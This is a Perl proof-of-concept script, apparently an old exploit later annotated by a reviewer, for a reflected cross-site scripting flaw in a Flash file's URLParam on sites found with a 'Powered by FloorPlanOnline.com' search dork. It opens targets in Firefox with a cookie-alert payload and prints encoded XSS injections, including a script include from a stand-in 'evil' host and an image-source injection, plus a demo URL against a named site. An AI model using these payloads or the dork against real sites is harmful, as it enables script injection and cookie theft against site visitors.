#!/usr/local/bin/perl -w
use strict;
use warnings;
use Getopt::Std;
use IO::Socket::INET;
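# Command-line driver for the proof-of-concept:
#   -T  append the demo payload string to the target given on the command
#       line and open the result in a local Firefox
#   -e  print the banner and the list of encoded example strings
#   -E  print the banner and the advisory text
# Option parsing stops at the first non-option argument; whatever is left in
# @ARGV is treated as the target for -T.
my %options;
getopts('TeE', \%options);
my $test    = $options{T};
my $encode  = $options{e};
my $exploit = $options{E};

if ($test) {
    my @target = @ARGV;

    # usage() dies, so nothing below runs when no target was supplied.
    usage() if @target == 0;

    # The target ends up on the browser's command line; refuse anything the
    # browser would parse as one of its own switches instead of a URL.
    for my $arg (@target) {
        die " [-] Target must not start with '-' (!)\n\n" if $arg =~ /\A-/;
    }

    my $files = ('javascript:alert:document.cookie');
    #--------------------------------------------------------------------------------
    # NOTE(review): 'PeerAdr' is not the documented IO::Socket::INET key (that
    # is 'PeerAddr'), and -T is documented as taking a URL rather than a host,
    # so this call presumably never verifies that the target is reachable.
    # Confirm before relying on the "Target not found" message.
    IO::Socket::INET->new(Proto=>"tcp",PeerAdr=>"@target",PeerPort=>"80")
        or die " [-] Target not found (!)\n\n";

    # Same text the original built with "@target$files": the payload string
    # is glued onto the last command-line word.
    my @browser_args = @target;
    $browser_args[-1] .= $files;

    print "[+] Connecting in @target .... \n\n ";
    print "\n\n\r
[*]...Exploit Done!\n\n";

    # List-form system() bypasses /bin/sh. The former single-string call let
    # the shell interpret '&', ';', '|', '$(...)' and backticks that occur in
    # ordinary URLs or in a hostile argument, i.e. command injection on the
    # operator's own machine.
    system('firefox', @browser_args) == 0
        or warn " [-] firefox did not exit cleanly (status $?)\n";
}
elsif ($encode) {
    print "/-------------------------------------------------------------------------------------\
[+] Bug: Remote Xss
[+] By: kmkz (c)
[+] Email : kmkz[at]live[dot]fr
[+] D0rk :Powered by FloorPlanOnline.com
--------------------------------------------------------------------------------------
[*]demo: http://vifp.com/p/check_flash.swf?URLParam=javascript:alert(document.cookie);
--------------------------------------------------------------------------------------
[+]kmkz's web site : http://kmkz-web-blog.blogspot.com
/-------------------------------------------------------------------------------------/\n\n";
    print "
@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Encoded XSS Injections @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@
(1) Cookie --> javascript%3Aalert%3Adocument.cookie\n\n
(2) Inclusion of evil Script --> %3C%20script%20src=%20[http://www.you-evil-site/bad.js]%20%3E%3C/script%3E \n\n
(3) Image Inclusion --> %3Cscript+type%3D%22text%2Fjavascript%22%3Edocument.image%5B0%5D.src%3D%22http%3A%2F%2F[your_site.com]%2F[image.jpg]%22%3B%3C%2Fscript%3E \n\n\n";
    # Exit status 1 is kept from the original even though nothing failed.
    exit(1);
}

if ($exploit) {
    print "/-------------------------------------------------------------------------------------\
[+] Bug: Remote Xss
[+] By: kmkz (c)
[+] Email : kmkz[at]live[dot]fr
[+] D0rk :Powered by FloorPlanOnline.com
--------------------------------------------------------------------------------------
[*]Can be exploited by malicious people to conduct cross-site scripting attacks.
-Input passed to the (URLPARAM) variable is not properly sanitised before
being returned to the user.
-This bug can be exploited to execute arbitrary script code in a user's browse
session in context of an affected site.
--------------------------------------------------------------------------------------
[*]demo: http://vifp.com/p/check_flash.swf?URLParam=javascript:alert(document.cookie);
--------------------------------------------------------------------------------------
[+]kmkz's web site : http://kmkz-web-blog.blogspot.com
/-------------------------------------------------------------------------------------/\n\n";
    # Exit status 1 is kept from the original even though nothing failed.
    exit(1);
}
elsif (!$test) {
    # Only complain when no mode switch was given at all. The original plain
    # "else" also fired after a completed -T run and ended it with the
    # "Missing Argument" message plus the usage text.
    print "[-] Missing Argument (!) \n";
    usage();
    exit;
}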
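# Print a blank line on STDOUT, then die with the option summary. Because the
# heredoc ends in a newline, die emits the text without a file/line suffix.
# Every call therefore ends the script with the help text on STDERR.
sub usage {
    print "\n";

    # The synopsis names the switches the script really passes to getopts
    # ('TeE'); the previous "[-f# -S# -p# -l]" matched none of them.
    die <<EOF;
Usage: $0 [-T url] [-e] [-E]
-T (Target) : test a defined target (url)
-e (encode) : give exemples of encoded XSS injection
-E (Exploit): to see my original exploit (avaible on Milw0rm )
-----------------------------------------------------------
Contact "kmkz" for more informations.
Mail: kmkz[at]live[dot]fr.
WebSite: http://kmkz-web-blog.blogspot.com
Board: www.collective-utopia.no-ip.fr
EOF
}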